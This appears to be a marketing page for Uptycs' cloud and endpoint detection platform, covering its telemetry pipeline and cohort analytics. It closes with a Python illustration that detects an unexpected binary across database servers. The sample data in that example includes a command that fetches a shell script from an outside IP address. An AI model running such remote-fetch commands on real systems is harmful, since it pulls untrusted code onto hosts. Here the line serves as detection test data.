
Our Approach

The shift up approach to cybersecurity

Structured telemetry
Collect and normalize telemetry close to its source.
Place security analytics processing power in the cloud.
Standards and APIs
Base data models and modes of interoperability on standards, using an API-first approach.
Unified data model
Provide a unified data model and UI for multiple teams and IT environments.
Enable composability, scalability, and interoperability for security controls.

One UI and data model, multiple solutions

Uptycs unified CNAPP and XDR product is built for modern defenders who have a charter to close security observability gaps across their cloud-native infrastructure.

Attack Surfaces
Telemetry sourced from across the modern attack surface
Cloud Providers

The most important way to improve cloud security posture is to ensure resources are configured correctly. It’s a task that can be difficult without visibility across cloud accounts. With Uptycs, IT and security teams can inventory cloud assets and resources, identify non-compliant resources, and access evidence needed for remediation — and more.

Cloud Workload
Container Runtime

As organizations adopt new processes and technologies for building and running applications, they require new types of security observability. Uptycs equips modern defenders with the functionality to protect container-based applications, whether run on-premises, or in the cloud—on a VM or in a serverless deployment.


When Kubernetes and container deployments scale up, it becomes difficult to inventory and monitor your fleet. To solve your problems around Kubernetes and container workflows, Uptycs offers Kubernetes security posture management (KSPM) to cover a broad range of security use-cases including hardening, compliance, and threat detection.

Endpoints Host OS

Developer laptops and other on-premises assets are key targets, containing cloud provider and GitHub credentials. All security tools generate alerts — but only Uptycs eXtended Detection and Response (XDR) streamlines telemetry across modern attack surfaces and gives you comprehensive detection and response capabilities, from the laptop to the cloud.


Uptycs Detection Cloud

A powerful analytics engine and data pipeline

Identity Fabric
Detection Network
Lambda Analytics
Flight Recorder
Threat Correlation
Data Lake
Uptycs Solutions

Data summarizations and visualizations that solve for multiple solutions

  • Cloud-Native Application Protection Platform (CNAPP)
  • Extended Detection and Response
  • Governance, Compliance and Audit Evidence
  • Cyber Asset Inventory and Insights
  • Ask Uptycs
How Our Data Pipeline Works

The power of structured telemetry

Uptycs unified CNAPP and XDR immediately begins ingesting and analyzing telemetry and gives you connected insights across all of your asset classes in the same place. This can be visualized as a data engineering pipeline with three stages: collect, aggregate, and analyze.

Pipeline diagram: collect, aggregate, analyze

  • Collect: attack surfaces feeding universal SQL-powered, query-based sensors and connectors; tabular and structured telemetry; secure TLS-based transport
  • Aggregate: XDN (X Detection Network) for cohort analytics; aggregate analytics
  • Analyze: Lambda analytics; historical flight recorder; threat intel correlation; SQL-powered data lake

Telemetry is captured via agent deployment to the host (osquery) or via native API integrations (kubequery, cloudquery) and transferred to Uptycs’ backend over an HTTP connection secured with TLS. The telemetry can be bucketed into two broad areas based on the attack surface:

  • First Grouping: based on osquery’s ability to interface with operating system interfaces such as kaudit, eBPF on Linux, ETW on Windows, and OpenBSM or the security API framework on macOS. Osquery uses these interfaces to collect system call behavior and translate it into a tabular JSON format.
  • Second Grouping: cloudquery and kubequery use native API integrations to ingest data and translate it into a structured table format.

The tabular telemetry can be acted upon while it’s streaming—for real-time correlation and alerting—and once it's been aggregated and stored for reporting and ad hoc historical querying.


This is where Uptycs’ speed and scale truly shine. Our eXtended Detection Network (XDN) applies scaling techniques such as consistent hashing, layered on HTTP and TLS load balancing, to scale ingestion horizontally and spread the load reliably. The Uptycs backend can concurrently ingest a wide variety of structured telemetry from multiple interfaces. The XDN also facilitates cohort analysis.

Example: telemetry is in flight from a cohort of 1,000 database servers, and anomalous behavior is identified on one of the machines. The anomalous behavior on the single machine is converted into a real-time query that then evaluates the other 999 machines.


In the analysis stage, Lambda analytics are used to analyze data while it’s in-flight for near real-time correlation. While in-flight, Uptycs correlates data with a variety of open source threat intel databases and independent research findings from the Uptycs Threat Research Team. Data is partitioned as a function of time and compressed so that the telemetry can be analyzed at scale.

This streaming analytics model allows Uptycs to take each row of structured data and correlate it using event and alert rules to generate signals. Billions of pieces of telemetry are narrowed to thousands of signals.

These signals are correlated into tens of detections, making it possible for humans and automation to see insights and make data-driven decisions, including those needed to satisfy a compliance requirement.
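As an added illustration of the cohort query described above (an anomaly on one database server turned into a query evaluated against its peers) and of the narrowing from rows to signals to detections, the following is example code written for this page, not Uptycs software. It assumes a hypothetical allowlist rule, constructed osquery-style process_events rows, and SQLite standing in for the SQL-powered data lake.

```python
import sqlite3

# Constructed osquery-style process_events rows from a small cohort of
# database servers (host, path, cmdline). Not real Uptycs telemetry.
TELEMETRY = [
    ("db-001", "/usr/bin/postgres", "postgres -D /var/lib/pgsql"),
    ("db-002", "/usr/bin/postgres", "postgres -D /var/lib/pgsql"),
    ("db-003", "/usr/bin/postgres", "postgres -D /var/lib/pgsql"),
    ("db-003", "/usr/bin/curl", "curl -s http://203.0.113.9/setup.sh"),
    ("db-004", "/usr/bin/postgres", "postgres -D /var/lib/pgsql"),
    ("db-004", "/usr/bin/curl", "curl -s http://203.0.113.9/setup.sh"),
]
# Hypothetical alert rule: binaries expected to execute on this cohort.
EXPECTED_PATHS = {"/usr/bin/postgres", "/usr/bin/pg_ctl"}


def load_cohort(rows):
    """Aggregate stage: land the tabular rows in a SQL-queryable store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE process_events (host TEXT, path TEXT, cmdline TEXT)")
    conn.executemany("INSERT INTO process_events VALUES (?, ?, ?)", rows)
    return conn


def stream_signals(rows):
    """Streaming rule applied per row: an unexpected binary yields one signal."""
    return [(host, path) for host, path, _ in rows if path not in EXPECTED_PATHS]


def cohort_query(conn, host, path):
    """Convert one host's anomaly into a query evaluated on the rest of the cohort."""
    cur = conn.execute(
        "SELECT DISTINCT host FROM process_events WHERE path = ? AND host != ? "
        "ORDER BY host", (path, host))
    return [row[0] for row in cur]


def detections(rows):
    """Correlate per-row signals into one detection per anomalous path."""
    conn = load_cohort(rows)
    found = {}
    for host, path in stream_signals(rows):
        hosts = found.setdefault(path, {host})
        hosts.update(cohort_query(conn, host, path))  # widen to matching peers
    return {path: sorted(hosts) for path, hosts in found.items()}


if __name__ == "__main__":
    print(detections(TELEMETRY))  # {'/usr/bin/curl': ['db-003', 'db-004']}
```

Six rows produce two signals and a single detection that names every host in the cohort running the unexpected binary.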


See Uptycs in action

Find and remove critical risks in your modern attack surface - cloud, containers, and endpoints - all from a single UI and data model. Let our team of experts show you how.